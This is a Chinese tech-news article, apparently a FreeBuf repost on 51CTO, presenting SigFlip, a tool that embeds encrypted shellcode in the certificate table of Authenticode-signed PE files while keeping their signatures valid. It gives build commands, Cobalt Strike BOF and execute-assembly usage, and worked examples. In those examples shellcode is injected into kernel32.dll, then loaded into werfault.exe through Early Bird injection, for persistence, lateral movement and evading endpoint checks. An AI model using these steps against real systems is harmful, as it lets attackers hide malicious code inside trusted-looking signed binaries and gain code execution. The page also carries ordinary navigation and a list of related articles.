51CTO首页
AI.x社区
博客
学堂
精品班
直播训练营
企业培训
鸿蒙开发者社区
WOT技术大会
AIGC创新中国行
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术2024年软考PMP项目管理软考资讯
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO题库小程序
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
账号设置 退出

如何使用SigFlip篡改身份认证码签名的PE文件

作者:Alpha_h4ck
安全 数据安全
SigFlip是一款能够篡改经过身份认证码签名的PE文件(exe、dll、sys等)的工具,而且整个过程不会影响或破坏已有的身份认证码签名。

[[426526]]

关于SigFlip

SigFlip是一款能够篡改经过身份认证码签名的PE文件(exe、dll、sys等)的工具,而且整个过程不会影响或破坏已有的身份认证码签名。换句话来说,就是我们可以使用SigFlip向PE文件中嵌入数据(比如Shellcode),并且再不会破坏文件签名、完整性检查或PE文件功能的情况下,修改PE文件的校验和或哈希。

SigInject组件可以将Shellcode注入至PE文件的[WIN_CERTIFICATE]证书表中,并输出加密密钥以便配合BOF/C/C#加载器(SigLoader)一起使用。SigInject将保存针对PE文件的修改操作,并保证其签名和证书有效性不变。

SigLoader是一个基础加载器,它采用SigInject创建的修改后的PE文件路径和解密密钥作为参数,然后提取和解密嵌入的Shellcode,以供选择Shellcode注入使用。

SigFlip将检查PE哈希是否已成功更改,然后退出以绕过终端针对此类行为的检查。

SigFlip可以用于持久化感染、横向渗透以及命令/代码执行等场景。

注意事项:igFlip、SigInject和SigLoader将以BOF脚本和.NET程序集提供。

工具安装

广大研究人员可以使用下列命令将该项目源码克隆至本地:

  1. git clone https://github.com/med0x2e/SigFlip.git 

工具构建/编译

本项目并没有提供预编译的BOF,我们可以使用Mingw-w64来进行编译。如果是.NET,可以使用VS或csc.exe来编译.NET项目(SigFlip、SigLoader);如果是BOF,请按照下列步骤操作:

  1. ➜ i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o 
  2.  
  3. ➜ x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o 
  4.  
  5. ➜ x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o 
  6.  
  7. ➜ i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o 

确保所有的对象文件都存储在sigflip.cna的相同目录下,然后在Cobalt Strike中加载sigflip.cna。

注意事项:预编译的BOF使用的是mingw-64 v8.0.0_3,如果你所使用的mingw-64 >= v9,可能会出现崩溃的情况。

Cobalt Strike

执行程序集:

  1. execute-assembly SigFlip.exe -h 
  2.  
  3. execute-assembly SigLoader -h 

BOF:

当我们在Cobalt Strike中加载sigflip.cna了之后,将会注册两个新命令,我们此时就能够以下列方式使用SigFlip和SigInject了。

  • SigFlip:在不破坏签名或证书有效性的情况下,修改PE文件哈希:
    1. SigFlip "<PE\_FILE\_PATH>" "<OUTPUT\_PE\_FILE\_PATH (with extension)>
  • SigInject:向PE文件的[WIN_CERTIFICATE]证书表中注入加密的Shellcode,打印的加密密钥可以跟基础C/C#加载器结合使用以保证签名和证书的完整性:
    1. SigInject "<PE\_FILE\_PATH> <OUTPUT\_PE\_FILE\_PATH (with extension)>" "<SHELLCODE\_FILE>
  • SigLoader:从PE文件中加载由SigInject加密的Shellcode,然后使用Early Bird向指定进程注入Shellcode,我们可以自定义Shellcode的注入逻辑,或直接替换目标代码:
    1. SigLoader <PE_FILE_PATH_WITH_SH> <DECRYPTION_KEY> <SPAWNTO_PROCESS_PATH> <PARENT_PROCESS_ID> 

工具使用样例

(1) BOF

向msbuild.exe注入随机数据:

  1. SigFlip "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" "C:\lolbins\modified-msbuild.exe" 

向kernel32.ell注入Shellcode:

  1. SigInject "C:\Windows\System32\kernel32.dll" "C:\random\modified-kernel32.dll" "C:\shellcode\cobaltstrike_or_msf_shellcode.bin" 
  2.  
  3. Sigloader "C:\random\modified-kernel32.dll" "DECRYPTION_KEY" "C:\Windows\System32\werfault.exe" 6300 

(2) 执行程序集

向msbuild.exe注入随机数据:

  1. execute-assembly SigFlip.exe -b C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -o C:\Temp\MSBuild.exe 

向kernel32.ell注入Shellcode:

  1. execute-assembly SigFlip.exe -i C:\Windows\System32\kernel32.dll -s C:\Temp\x86shellcode.bin -o C:\Temp\kernel32.dll -e TestSecretKey 
  2.  
  3. execute-assembly SigLoader.exe -f C:\Temp\modified-kernel32.dll -e TestSecretKey -pid 2354 

项目地址

SigFlip:【GitHub传送门

 

责任编辑:赵宁宁 来源: FreeBuf
SigFlip身份认证安全工具
相关推荐
Windows版iCloud密码开始支持2FA双因素认证码
根据Reddit上发布的用户报告,苹果iCloudforWindows应用程序中的iCloudKeychain密码管理器现在支持双因素认证代码。双因素认证,或称2FA,作为在线账户的额外安全层,在账户所有者登录时要求密码管理器生成一个代码。

2022-07-26 23:45:29

Windows系统苹果
如何加固基于云端凭据身份认证
本文在分析了当前云服务安全威胁的基础上,讨论了如何加固基于云端凭据的身份认证方式。

2022-01-17 09:00:00

漏洞网络安全身份认证
PDF发现高危安全漏洞 黑客可篡改你已签名合同/文件
在今年的信息安全顶级峰会S&P上,来自德国波鸿鲁尔大学(RUB)的研究团队介绍了存在于PDF格式中的安全缺陷。

2021-06-03 09:33:23

PDF漏洞黑客
如何选择一款身份认证服务?
Auth0和Cognito它们的区别在哪里,如果想要构建一个认证服务,应该如何选择供应商呢?本文将从用户使用的角度以及开发者的角度进行对比。

2023-07-03 08:25:54

如何通过 ASWebAuthenticationSession 获取身份验证 Code
当用户导航到站点的身份验证URL时,站点将向用户提供一个表单以收集凭据。验证凭据后,站点通常使用自定义方案将用户的浏览器重定向到指示身份验证尝试结果的URL。

2021-05-11 19:58:01

身份验证Code
RSA身份认证决策树构建强身份认证体系
2012年11月22日,EMC信息安全事业部RSA中国区资深技术顾问冯崇彪主持了“探寻可信、安全登录之谜”的技术研讨会。会上,他深度分析了四种主流身份认证的特点,并就RSA身份认证决策树做了演示,希望可以通过RSA开放接口与更多安全企业以及安全领域的开发者一起构建满足不同企业安全需求的生态系统。

2012-11-28 09:55:35

带你掌握PPP协议身份认证
对于PPP协议,讲述的内容非常多。今天我们则重点讲解一下PPP协议的身份认证的内容。其中包括了PAP、CHAP单双向身份认证的内容。

2010-09-03 09:19:13

PPP身份认证
人工智能时代身份认证
在现实世界里有身份证、进门卡、工作证等实物认证方式,在数字世界里表现出来的可能是证书、Token等,身份认证对于保护用户资产和信息是至关重要的。

2018-07-05 14:52:05

Manalyze:PE文件静态分析工具
当我的杀毒软件第13次尝试隔离我的病毒样本集时,我决心开发Manalyze。另一方面的原因也是我对杀毒软件日益失望,它们不会解释为什么把某个文件判断为恶意软件。显然,大部分人需要有个杀毒软件来帮他们做决定。

2016-05-17 13:54:05

浅析VPN身份安全认证
本文主要介绍了VPN和USBKey的技术的介绍,希望大家能够通过以下的介绍清楚的认识这两个知识。

2011-03-30 13:21:17

vCenter SSO身份认证概述
vSphere5引入了SSO,允许将不同的基础设施比如vCenter以及WebClient安装在不同的虚拟机上。SSO是一个通信通道,使管理员不用将所有的基础设施都安装在vCenterServer上,但很多人对SSO及其工作机制存在误解。

2014-04-22 10:15:38

vCenter SSO身份认证
无线POS机系统五大安全问题解析
进行身份认证、身份鉴别、数字签名防止抵赖和篡改,以及交易数据的加密解密等是保障无线POS机系统安全的重要手段,本文将会为你分析无线POS机系统五大安全的问题。

2011-07-28 14:45:07

无线POS机系统
数字签名和数字认证不同
本文向大家详细介绍了数字认证和数字签名之间的区别。

2010-10-08 21:14:08

重新评估云中身份认证管理系统
认证管理保证了跨越多个系统的用户身份的一致性。该技术自动化战略性的IT任务,结合用户权限和用户身份的限制,允许员工只访问自己权限以内的数据。目的是通过确保资源的稳定性从而维护企业安全。另外,随着云计算越来越多地深入到数据中心管理,基于云计算的系统面临新的挑战。

2013-06-19 09:46:57

身份认证管理云应用
重新评估云中身份认证管理系统
随着越来越多的新安全风险的威胁,确保企业数据安全和完整也逐渐变得重要。身份认证管理软件对访问不同数据的用户进行管理,帮助企业确保数据安全。

2013-06-18 19:23:16

身份认证管理身份认证管理系统身份认证
图解设计模式:身份认证场景应用
在整个块认证流程中,我们会讲解三种设计模式,按照顺序分别是策略、责任链、模板模式。

2022-02-13 22:42:52

设计模式策略
如何使用 Wipefs 命令擦除磁盘上签名
每个磁盘和分区上都有某种签名和元数据魔术字符串。你可以使用wipefs命令查看分区表签名元数据魔术字符串。wipefs命令可以擦除文件系统,RAID或分区表签名元数据。

2021-05-20 08:07:48

磁盘签名Wipefs
电子发票有漏洞:“影子攻击”可篡改数字签名PDF文档
近日,研究者又发现一种新型的PDF攻击技术——影子攻击。影子攻击规避了目前所有的PDF安全对策,并破坏了数字签名PDF的完整性保护。

2021-03-09 10:51:23

漏洞网络安全网络攻击
ASP.NET Forms身份认证
在这篇博客中,不会涉及ASP.NET的登录系列控件以及membership的相关话题,我只想用比较原始的方式来说明在ASP.NET中是如何实现身份认证的过程。

2012-04-16 09:54:26

PPP身份认证?你了解吗?
下面我们来对ppp身份认证内容进行一下分析和讲解。那么通过对这些认证内容的掌握,我们能够更好地应用ppp协议。

2010-09-06 14:03:06

PPP身份认证
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服